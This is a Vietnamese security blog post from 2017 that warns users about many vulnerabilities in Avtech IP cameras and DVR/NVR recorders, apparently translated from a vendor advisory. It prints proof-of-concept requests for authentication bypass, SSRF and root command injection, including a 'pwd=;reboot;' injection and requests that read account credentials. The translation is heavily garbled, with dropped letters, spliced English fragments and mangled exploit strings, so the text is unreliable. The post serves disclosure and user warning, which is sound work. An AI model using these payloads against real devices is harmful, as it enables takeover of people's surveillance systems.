The security diy

The security diy
..

Thứ Hai, 3 tháng 4, 2017

Lỗ hổng bảo mật từ camera Avtech là rất nghiêm trọng. ( cảnh báo cho người dùng VN )

Avtech nhiu lhng bo mt trong camera và hệ thống giám sát
Nn tng và phn cng của Avtech được xác nhn bị ảnh hưởng rất nghiêm trọng. ( trong bài viết nêu cụ thể các tính năng bị bỏ trống và các lệnh khai thác dễ dàng vào trong một camera hay Dvr,Nvr của Avtech.com.tw.)

Mi thiết bca Avtech  Taiwan (camera IP, NVR, DVR) với phiên bn phn mm có sẵn, cha danh sách các phiên bn phn mm đă được xác nhn đă bị ảnh hưởng.

Trang sn phm: http://www.avtech.com.tw/

"AVTECH, thành lp năm 1996, là mt trong nhng nhà sn xut CCTV hàng đu trên thế gii. Vi doanh thu gia tăng n đnh và triết lý kinh doanh thc tin, AVTECH đă được xếp hng là công ty niêm yết ln nht trong ngành công nghip giám sát ca Đài Loan''.

AVTECH nlc hết mình để đổi mi công ngh, sn phm và thc hin sản xuất. Da trên nhng năm nghiên cu và kinh nghim trong ngành, AVTECH đă có được vtrí hàng đu vhtrnn di đng và cung cp đy đcác sn phm hệ thống camera giám sát.

Avtech là thut ngtìm kiếm phbiến thhai trong nguồn tìm kiếm Shodan. Theo Shodan, hơn 130.000 thiết bca Avtech đang tiếp xúc internet trong mã-lỗi an ninh quan trọng này.

Các lhng

1) Lưu tr mt khu qun tr dạng Plaintext.
Mi mt khu người dùng được lưu trtrong một văn bn txt rő ràng. Mt ktn công có quyn truy cp vào thiết bchính nó có thddàng có được danh sách đy đcác mt khu. Bng cách khai thác các lnh tiêm hoc các vn đbqua xác thc, kẻ tấn công có thtruy xut mt khu qun trbằng một tập tin văn bn rő ràng.

2) Thiếu bo vCSRF .
Giao din web của Avtech không sdng bt kbo vCSRF nào. Nếu mở phiên mặc định tn ti cho người dùng, ktn công có thsa đi tt ccác cài đt ca thiết bqua CSRF. Nếu không có phiên làm vic hp l, nhưng người dùng không thay đi mt khu qun trmc đnh, ktn công cũng có thể đăng nhp như qun trviên thông qua CSRF.

3) Không chng thc thông tin công b

Dưới thư mc / cgi-bin / nobody , mi tp lnh CGI đu có thể được truy cp mà không cn qua các thủ tục xác thc.
POC:
GET /cgi-bin/nobody/Machine.cgi?action=get_capability

Ví dtrli:

Firmware.Version = 1011-1005-1008-1002
MACAddress = 00: 0E: 53: xx: xx: xx
Product.Type = DVR
Product.ID = 308B
Product.ShortName = V_full_Indep, V_Multistream
Video.System = PAL
Audio.DownloadFormat = ULAW
Video.Input.Num = 8
Video.Output.Num = 1
Video.Format = H264, MJPEG
Video.Format.Default = H264
Video.Resolution = 4CIF, CIF
Video.Cht lượng = BEST, HIGH, NORMAL, BASIC
Video.Local.Input.Num = 8
Video.Local.Output.Num = 1
Video.Local.Format = H264, MJPEG
Audio.Input.Num = 8
Audio.Output.Num = 1
Audio.Format = ULAW
Audio.Local.Input.Num = 8
Audio.Local.Output.Num = 1
Audio.Local.Format = PCM
Ngôn ng.Default = ENGLISH

Language.Support = ENGLISH & CHINESE & JAPANESE & PHÁP & GERMAN & Tiếng Tây Ban Nha & PORTUGUESE & ITALIAN & TURKISH & POLISH & RUSSIAN & CUSTOMIZE & THAI & VIT NAM & DUTCH & GREEK & ARABIC & Séc & Hung và HEBREW & CHINA &
Khnăng = D0,80, A, 80
PushNotify.MaxChannel = 8

4) Không xác thc SSRF trong thiết bDVR

Trong trường hp với thiết bDVR, Search.cgi có thể được truy cp mà không cn xác thc. Dch vnày có trách nhim tìm kiếm và truy cp vào các camera IP trong mng ni b. Trong các phiên bn phn mm mi hơn, Search.cgi cung cp hành đng cgi_query, thc hin mt yêu cu HTTP vi các tham số được chỉ định. Bng cách sa đi các tham sip, port và queryb64str, ktn công có ththc hin các yêu cu HTTP tùy ý thông qua thiết bDVR mà không cn phải xác thc.
POC:
/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==

"Http: // <device_ip> /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==

5) Không cn xác thc đ tiêm lnh trong các thiết bDVR

Hành đng cgi_query trong Search.cgi thc hin các yêu cu HTML vi lnh hthng wget, sdng các tham số đă nhn mà không cn dn sch hoc xác minh theo đúng thông l an toàn. Bng cách khai thác vn đnày, ktn công có ththc hin bt klnh hthng nào vi quyn  root  mà không cn xác thc.
POC:
/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password$(ps"Http: // <device_ip> /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password> $ (ps | Grep% 20Search.cgi | grep% 20-v% 20grep | đu% 20-n% 201 | awk% 20 '(in% 20 "/ tmp /" $ 1 ".log"}'); & password = admin

6) bqua xác thc # 1 (.cab)

Plugin cho chương trình phát video được lưu trdưới dng tp .cab trong thư mc gc ca web, trưng hp này có thể được truy cp và ti xung mà không cn xác thc. Xác minh yêu cu tp cab trên máy chweb streamd được thc hin vi chc năng strstr , có nghĩa là yêu cu không cần được xác thc nếu nó có cha chui ".cab" bt knơi nào trong URL.

ü Antoanvn lưu ý bn rng : mt smô hình camera dvr tt của các nhà sản xuất khác hơn đu có cha mt lnh kim tra bsung trong CgiDaemon, cho phép cgi unauthenticated chtruy cp vào thư mc / cgi-bin / nobody.
POC:
/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
"Http: // <device_ip> /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*

7) bqua xác thc # 2 (nobody)

Cgi script trong thư mc / cgi-bin / nobody có thể được truy cp mà không cần có sự xác thc (ví dnhư để đăng nhp). Máy chweb streamd  khi xác minh cho yêu cu có thể được thc hin mà không cn xác thc bng cách tìm kiếm chui "/ nobody" trong URL vi chc năng strstr.

Vì vy, nếu có mt yêu cu nào cha chui "/ nobody"  ti bt knơi nào trong URL, khi đó nó không cn phi được chng thc.
ü Antoanvn lưu ý bn rng: mt smô hình camera dvr tt hơn của các nhà sản xuất khác ,luôn luôn có cha mt lệnh kim tra bsung trong CgiDaemon, cho phép cgi unauthenticated chtruy cp vào thư mc / cgi-bin / nobody.
POC:
/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*

"Http://<device_ip> /cgi.bin/user/Config.cgi?/nobody&action=get&category=Account.*

8) Không được chng thc khi ti v
(File download from web root)

Nếu mt file .cab được yêu cu, máy chweb sgi tp tin mà không cn xlý nó. Bi vì  máy chweb streamd xác minh yêu cu tp cab bng cách tìm kiếm chui ".cab" trong URL có chc năng strstr, bt ktp nào (ngay ccác tp lnh cgi) trong web root có thể được ti xung mà không cần có xác thc.
POC:
http: / / /cgi-bin/cgibox?.cab9) Login captcha bypass #1To prevent brute-forcing attempts, Avtech devices require a captcha for login requests."/<device_ip>/cgi-bin/cgibox?.cab9)  

Đăng nhp captcha bypass # 1
Đngăn chn các nlc brute-force, thiết bAvtech yêu cu mt captcha cho các yêu cu đăng nhp. /cgi-bin/nobody/VerifyCode.cgi?account=&login" .Tuy nhiên, nếu các yêu cu đăng nhp cha thông slogin = quick, vic xác minh captcha được bqua.
POC:
http: // <device_ip> /cgi-bin/nobody/VerifyCode.cgi?account= <b64 (username: password)> và đăng nhp = Quick10)

Đăng nhp captcha bypass # 2
Thay vì sdng ID theo các phiên ngu nhiên, thiết bcamera Dvr ca Avtech sdng tên người dùng và mt khu được mă hoá base64 dưới dng giá trCookie. Vì đa chIP ca người dùng đă đăng nhp không được lưu tr, nếu ktn công đt Cookie theo cách thcông, xác minh captcha có thbqua ddàng.11)

Vic tiêm lnh injection được xác thc trong CloudSetup.cgiDevices htrợ đám mây Avtech cha CloudSetup.cgi  .Được truy cp sau khi xác thc.

Tham sexefile ca mt yêu cu CloudSetup.cgi chra lnh hthng sẽ được thc thi. /cgi-bin/supervisor/CloudSetup.cgi?exefile=ps12 .Vì không có kim tra hoc kim tra da trên danh sách trng ca tha
Kích hot lnh đă được thm đnh trong adcommand.cgiSome ca các thiết bAvtech cha adcommand.cgi  đthc hin các lnh ActionD. Adcommand.cgi có thể được truy cp sau khi xác thc.
Trong các thiết bmi hơn, daemon ActionD cung cp chc năng DoShellCmd, thc hin cuc gi hthng vi các tham số được chỉ định. Vì không có kim tra hoc kim tra da trên danh sách trng ca tham sca chc năng DoShellCmd, ktn công có ththc hin các lnh hthng tùy ý vi các đc quyn root.
POC:
POST /chelp /chelp / bộ điu khin / ads_micro.cgi HTTP / 1.1Host: <device_ip > PwdGrp.cgi

Sdng tên người dùng, mt khu và các tham snhóm trong mt yêu cu to hoc sa đi người dùng mi trong mt lnh hthng mà không cn có strgiúp ca PwdGrp.cgi. để xác nhn hoc khtrůng.
Do đó và ktn công có ththc hin các lnh hthng tùy ý vi quyn root. 

/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN14)

"Chúng tôi biết rng lhng này đang được khai thác trong tnhiên
POC:
http: // <device_ip> /cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN14)

HTTPS được sdng mà không có chng chxác minh Tác gi . SyncCloudAccount.sh, QueryFromClient.sh và SyncPermit.sh sdng wget đtruy cp các trang web HTTPS, chng hn như https: //payment.eagleeyes.tw, bng cách xác đnh tham skhông kim tra chng ch.
Do đó, wget bqua xác minh chng chmáy chvà mt cuc tn công MITM có thxy ra đi vi giao tiếp HTTPS.

Timeeline  ghi nhận lại các báo cáo về sự liên lạc từ Search-labs và Trend micro đến Avtech.
  • 2015.10.19: Lần đu tiên cgng liên lc vi Avtech, nhưng chúng tôi không nhn được phn hi 2016.05.24: Ln thhai liên lc Avtech mà không có bt kphn ng
  • 2016.05.27: Lần thba c-gắng liên lc vi Avtech bng cách gi e-mail đến các đa che-mail công cng ca Avtech. Chúng tôi đă không nhn được phn hi.
  • 2016.09.10: Cgng liên lc vi Avtech mà không có bt kphn ng.
  • 2016.10.11: Toàn bthông tin mrng Công trình POCPOC có sn đchng minh các vn đsau: Unauthenticated rò rthông tin (khnăng) Bqua xác thc (.cab, không ai) Unauthenticated SSRF trên các thiết bDVR Đă vô hiu hóa lnh tiêm trên các thiết bDVRLogin captcha bqua vi đăng nhp =quick hoc hướng dn sdng cookie injectionCloudSetup.cgi   lnh tiêm sau khi tiêm lnh authenticationadcommand.cgi sau khi xác thc
 Mt loạt phản ảnh bằng youtube video cũng có sn , trong đó trình bày mt svn đtrên.

Khuyến ngh 

 Tht không may ''Hin ti không có gii pháp nào cho nhng lhng này ''.

Thêm thông tin kỹ thuật về Avtech camera.: Click tải về   từ nguồn antoanvn diy.

Bn có ththc hin các bước sau đbo vthiết bca bn tạm thời:
ü Thay đi mt khu qun trmc đnh.
ü Nên phơi bày giao din web ca bt kthiết bAvtech nào vi Internet

Chúng tôi lưu ý rng các lhng trên đă được tìm thy trong mt khong thi gian ngn mà không có cách tiếp cn có hthng.

Da vào các loi lhng mà chúng tôi tìm thy và cht lượng mă nhìn tng th, các thiết bị sau này nên cho cài bản vá tương tự mới , nếu không có thì khả năng camera còn chất-cha nhiu vn đhơn.

Antoanvn.com 2017@antoanvn the security diy -elearning-training in Vi language


Không có nhận xét nào:

Đăng nhận xét

Bài đăng nổi bật

Hướng dẫn lắp đặt hệ thống báo cháy Nohmi Japan.

Hệ thống báo cháy tự động Nohmi của nhà sx Nohmi Bosai Japan là một trong những hệ thống báo cháy tiêu chuẩn quốc tế, loại 24V đáp ứ...